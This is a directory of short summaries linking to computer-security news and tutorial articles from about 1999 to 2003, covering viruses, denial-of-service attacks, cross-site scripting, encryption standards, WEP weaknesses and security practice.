According to security expert Ira Winkler, there are now 50,000-100,000 "hackers" (read: crackers) worldwide, most of whom could be stopped if system administrators installed known patches for known vulnerabilities. (12/16/1999 at InfoWorld)
Security: 3 Confabs' Killer App
Three tech conferences held simultaneously in the Javitz Convention Center in New York - Internet World Wireless East, Pocket PC, and Seybold Seminars - focused a great deal of time on security and digital rights management. (2/21/2002 at Wired News)
Setting Up a MySQL Based Website - Part II
How to use MySQL to control user access to your site. (1/24/2000 at Linux Planet)
Shockwave Computer Virus Found, Threat Low
Security experts have been sent a Shockwave Flash virus called SWF/LFM.926. (1/8/2002 at Yahoo News)
A Short History of Computer Viruses and Attacks
A history of computer viruses and attacks, from 1945 to 2003. (2/14/2003 at SecurityFocus)
Simpler Ways to Stymie Cyberthiefs
Suggestions on how credit card companies can make online credit card use more secure, with minimal extra effort required by both consumers and merchants. One solution: build smart-card readers into computer keyboards, and require buyers to use a PIN. (3/6/2001 at Business Week)
Size Matters: Gnutella Worm Leaves a Trail
A "proof of concept" worm has been released on Gnutella; it has spread very slowly, but demonstrates the ability to spread unwanted programs on file-sharing networks. (2/27/2001 at ZDNet)
So Long, and Thanks for All the Fish
Elias Levy, aka Aleph1, is giving up his duties as moderator of the popular BugTraq mailing list; he will be replaced by David Ahmad. (10/15/2001 at SecurityFocus)
Software That Asks "Who Goes There?"
Companies including Courion, Access 360, M-Tech, Computer Associates, and others hope to sell large companies on technology that automates assigning new passwords to employees who have forgotten theirs. (2/26/2002 at Business Week)
Specter of Web Attacks Looms Anew
At the 2000 DefCon conference in Las Vegas, white-hat hacker Simple Nomad, who last year anticipated the denial-of-service (DOS) attacks that hit large commercial sites in February 2000, revealed a new blueprint for untraceable DOS attacks. (8/6/2000 at ZDNet)
Stealing MS Passport's Wallet
Software developer Marc Slemko demonstrated the insecurity of Microsoft's Passport by showing how to obtain a Hotmail user's credit card information merely by getting the user to open an email message. (11/2/2001 at Wired News)
Strategies to Reduce False Positives and False Negatives
A brief overview of network-based intrusion detection systems, and the false positives and false negatives they sometimes generate when detecting unauthorized connections. (9/11/2001 at SecurityFocus)
Study: Many Still Lax on Securing DNS
A survey by an Iceland-based DNS consultancy indicates that the pace at which Internet sites are upgrading to a secure version of BIND has slowed dramatically; 13.1% of dot-coms are supposedly still running insecure versions. (3/2/2001 at InfoWorld)
Study: Money Alone Won't Shoo Away Hackers
A study from magazine Information Security said that cyberattacks are on the rise, though security spending has doubled in a year; 8 out of 10 companies were attacked; and companies need to pay more attention to insider (employee) attacks. (10/5/2000 at The Industry Standard)
Sudo Contains Root Exploit
Unix and open-source security advisories: buffer overflows in sudo and innfeed; race conditions in Samba and VMware; and more. (4/24/2001 at O'Reilly Network)
Symmetric Cryptography in Perl
Implementing ciphers with Perl, using the TwoFish module. (7/10/2001 at Perl.com)
Technology Will Play Bigger Role in Security
In the wake of the terrorist attacks on the WTC and Pentagon, national electronic ID cards may be issued, law enforcement officials granted greater surveillance powers, and routine video surveillance increased. (9/18/2001 at The New York Times)
The Terrorists Are Winning the Cyber War
Due to poor interagency communication, antiquated equipment, rapidly-advancing technology, and the availability of very effective cryptography, the U.S. government is finding it hard to monitor terrorists' activities online. (9/19/2001 at Los Angeles Times)
Terrorists' Online Methods Elusive
U.S. federal officials, believing that Osama bin Laden and his associates are using encryption and steganography to communicate over the Internet undetected, are calling on Internet encryption experts to be ready to help investigations. (9/18/2001 at The Washington Post)
The 21 Best Ways to Lose Your Information
A tongue-in-cheek look at common ways people compromise their security. (8/23/2002 at SecurityFocus)
The Cross-Site Scripting Scam
A theory concerning Microsoft's warning about the cross-site scripting security problem: it's a ploy to scare citizens so that they don't engage in "promiscuous surfing" - that is, looking at non-corporate websites. (2/7/2000 at ZDNet)
The Third Wave of Network Attacks
The first attacks against computers were physical (pulling out wires, theft of hardware); the second, syntactic (attacking the logic of software and networks). The third wave will be semantic: fooling people and computers with false content (aka fraud). (10/3/2000 at ZDNet)
The Web Whodunit
A run-down of the various theories concerning who's behind the DOS attacks that hit eBay, buy.com, and other major sites, and links to articles detailing the theories. (2/10/2000 at Salon.com)
Top 10 Security Stories of 2000
The VBS/Kakworm, Israelis and Palestinians hacking each other, the malleable Hybris virus, always-connected home PCs become security risks, DOS attacks, ILOVEYOU... (12/24/2000 at ZDNet)
Top 10 Vulnerabilities in Web Applications
Discussion of the Open Web Application Security Project's (OWASP) list of the top 10 security vulnerabilities in web applications. (1/13/2003 at Slashdot.org)
Toward More Cybersecurity in 2002
Resolutions to make the Net safer in 2002: Microsoft must get serious about security; firewalls should be mandatory; router security should improve; and the government should handle its own cybersecurity better. (1/2/2002 at SecurityFocus)
Trouble Indemnity for Web Sites
Companies are offering websites insurance against loss due to disgruntled employees, crackers, viruses, and extortion. (1/20/2000 at Wired News)
The Twenty Most Critical Internet Security Holes
Discussion of the SANS Institute and the National Infrastructure Protection Center (NIPC)'s updated document on the 20 most critical security holes on the Internet. (10/3/2001 at Slashdot.org)
Two Views of Hacking
Interviews on hacking and cracking with hacker Emmanuel Goldstein, editor-in-chief of 2600: The Hacker Quarterly; and Dr. Charles C. Palmer, a computer security expert for IBM. (9/30/2000 at The New York Times)
U.S. Cyber Security Weakening
According to the Computer Science and Telecommunications Board, computer and network security is getting worse, because vendors and end-users don't implement readily-available recommended security measures. (1/8/2002 at Wired News)
U.S. Picks New Crypto Standard
The U.S. government has chosen Rijndael as the new encryption standard it will use to encrypt sensitive government data. (10/2/2000 at Wired News)
Uncovering the Secrets of SE Linux: Part 1
An in-depth look at how SE Linux, the security-enhanced Linux released by the National Security Agency (NSA), improves on Linux's typical security models. (3/8/2001 at IBM)
Using SSH Tunneling
How to create secure connections between two ssh-enabled machines to tunnel traffic securely. (2/23/2001 at O'Reilly Network)
War Driving by the Bay
Security consultant Peter Shipley, armed with a laptop and an external antenna, plans to map out 802.11 networks throughout the San Francisco Bay Area; the wireless networks provide a hole through the firewalls of the corporations that run them. (4/13/2001 at The Register)
Warning From Microsoft on False Digital Signatures
A hacker convinced VeriSign Inc., a certificate authority, to issue him or her an electronic certificate in Microsoft's name; VeriSign says this is the first time that something like this has happened. (3/23/2001 at The New York Times)
Webserver Security (Part I)
A basic look at web server security, focusing on determining TCP ports to keep open and network configuration. (4/19/2000 at DevShed)
Welcome to the Era of Cyber-Contagion
Because computers are growing more and more interconnected through networks and new messaging protocols, we can expect more rapidly-spreading viruses like "I Love You." (5/9/2000 at Business Week)
Western Union Web Site Hacked
Western Union's website, www.westernunion.com, was cracked on September 8th; the crackers copied the credit card information of 15,700 customers before Western Union turned the site off. (9/10/2000 at MSNBC)
What You Need to Know Before Setting up a Firewall
How to write a sensible security policy, and who should be involved in the writing. (12/14/2000 at IBM)
What's Up With WEP?
Security problems with Wired Equivalent Protocol (WEP), how serious the problems are, and how they should be dealt with. (4/26/2001 at IBM)
Who Do Cops Call? Virus-Busters
Richard Smith, Fredrik Bjorck and Jonathan James, the trio primarily responsible for tracking down the author of the Melissa virus, worked together again to track down the creator(s) of the "Love Bug"/ILOVEYOU virus. (5/12/2000 at Wired News)
Who's Going to Train the Cyber Security Pros?
Despite the need for more computer security workers, such people are not being trained; too often, teachers are lured to high-paying jobs working in the field. (2/16/2000 at Business Week)
Why RSA's Loss Is Everyone Else's Gain
On September 20, 2000, RSA's patent on its public-key encryption algorithm will expire. This will probably mean cheaper encryption software for the consumer, and most likely won't hurt RSA. (1/23/2000 at ZDNet)
Why Worm Writers Stay Free
Virus and worm writers often brag about their exploits and aren't caught anyway; as with non-computer crimes, investigators only have limited resources with which to investigate crimes, and rely on tips from the public to catch criminals. (12/27/2001 at Wired News)
Win2000 Security Hole a 'Major Threat'
Security expert David Litchfield has uncovered a major security bug in Win2000 even before the operating system officially started shipping. (1/28/2000 at ZDNet)
Windows ME Bugged by Flaw
Windows ME is vulnerable to a denial-of-service attack which was first identified on Windows 98. (9/14/2000 at Wired News)
Wired News 'Love Bug' Coverage
A series of articles from Wired News on the "Love Bug," the early-May 2000 worm/virus that spreads via Visual Basic-based email attachments. (5/6/2000 at Wired News)
XSS, Trust, and Barney
A look at how new (and old) web technologies, and browser bugs, enable cross-site scripting - in which a link from one web page to another sends unexpected data to the second website, causing unwanted side-effects. (4/27/2000 at WebMonkey)
|
